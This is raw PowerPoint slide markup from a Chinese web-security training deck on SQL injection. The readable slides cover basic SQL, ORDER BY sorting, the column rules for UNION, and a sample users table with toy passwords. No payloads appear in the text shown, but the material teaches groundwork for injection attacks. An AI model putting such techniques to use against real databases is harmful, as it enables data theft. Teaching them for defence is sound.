                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF174A67-4922-4BC6-83D2-A97098BCC17B}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="图片 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{490AC81D-D163-438F-AA91-71F04C136D7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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAE7FC58-4EF1-4ABD-81A1-6E6412A84DB2}"/>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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC890AC9-3867-4259-8B59-37ACD32E37CB}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形: 圆角 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25986EA-6FBC-4E48-A751-EA1845E19251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659835" y="1047234"/>
            <a:ext cx="8891619" cy="4763531"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="矩形: 圆角 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E737E0-FBC4-4515-BB09-A467653EF578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224570" y="-773"/>
            <a:ext cx="888523" cy="2024781"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="475574"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="矩形: 圆角 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24D5ACD-59BD-448F-A0AD-AC07CF1A1435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112784" y="4822666"/>
            <a:ext cx="888523" cy="2024781"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="475574"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21220048-1A69-4A6C-9963-E859FE36AD3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429756" y="2674551"/>
            <a:ext cx="6649151" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>第二次培训</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>          ——SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="363281"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2326874" y="1280535"/>
            <a:ext cx="3639138" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>排序查询（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ORDER BY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506A9063-63A2-47AD-8125-A799B95F7095}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="2011225"/>
            <a:ext cx="5822646" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查询语句 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>列名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>desc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A158C39-B726-4DB1-8A64-609BF4A18408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8525013" y="960469"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52E157B-EA8C-4D19-962F-2D25FAC60A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1839496" y="5734163"/>
            <a:ext cx="4495141" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  * from users order by id;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07EA76D8-58F9-4B6F-AF2A-79B82399A675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7054791" y="1456745"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>passwd</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
